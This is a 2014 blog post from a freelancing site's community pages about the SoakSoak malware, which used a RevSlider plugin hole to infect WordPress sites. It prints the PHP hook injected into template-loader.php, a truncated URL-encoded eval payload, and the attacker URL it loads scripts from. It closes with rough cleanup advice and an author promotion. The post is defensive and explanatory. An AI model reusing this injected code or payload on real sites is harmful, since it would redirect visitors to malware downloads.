What's Up with Google Blocking 1 Million WordPress Sites?

发布于 - 最后修改于

Google is de-indexing and blocking sites enabled with the RevSlider plugin. By using a security loop hole found in the WP premium plugin RevSlider, SoakSoak modifies a file in a site’s WordPress installation and loads JS malware.

RevSlider is often used in WordPress themes, some time this plugin is pre-loaded in WP themes , so site owner do not even get notifed about the vulnerability found on his/her site, Moreover, it’s not a plugin that’s easily updated, as Sucuri’s Daniel Cid commented:

“The biggest issue is that the RevSlider plugin is a premium plugin, it’s not something everyone can easily upgrade and that in itself becomes a disaster for website owner. Some website owners don’t even know they have it as it’s been packaged and bundled into their themes”.

Visitors of infected sites may be redirected to a webpage that will attempt to download malware onto their computers. Google’s decision to block infected sites shortly after the vulnerability became known will hopefully prevent the malware from spreading any further.

Anatomy Behind SoakSoak Malware:

It is modifying the file wp-includes/template-loader.php and including following code snippets:

<?php
function FuncQueueObject()
{
  wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

Above Snippet further resulted in Js Code file found at wp-includes/js/swfobject.js to be loaded on every page you view on the site which includes the malware here:

eval(decodeURIComponent ("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

This malware when decoded loads a javascript malware from the SoakSoack.ru domain, specifically this file: http://soaksoak.ru/xteas/code and then it will leads visitor to download certain files forcefully.

If you are curious about your site, you should check if your site got infected by Soak-Soak Malware from Free SiteCheck scanner -- signatures have all been updated to detect the latest redirection:

Sucuri soaksoak site check

Solutions :

Solutions not yet found on older version of Revslider Plugin, but you can keep update latest plugin to avoid security loop hole.

If your site already got infected by this malware you first update the plugins or better to remove it as well as there is a list of resources in this WordPress Support thread that can help you correct the problem.

立即订阅每周更新

随时掌握Freelancer社区的最佳文章。现在就订阅每周最好的设计、开发和自由职业内容。

发布的 21 十二月, 2014

Growth Hacker

SEO Consultant , UI/UX Expert & WordPress Pro

Thank you for visiting one of the brilliant profile on Freelancer.com. Why should you hire me, when you can easily find lots of other professionals around the site? Here are the facts: 1) I am an expert at ranking your site on Google first Page, By using my SEO Skills. 2) I can craft your PSD into HTML5 or WORDPRESS Responsive website . I'm also great at creating E-commerce sites with Paymen...

下一篇文章

How to Install and Start Using WordPress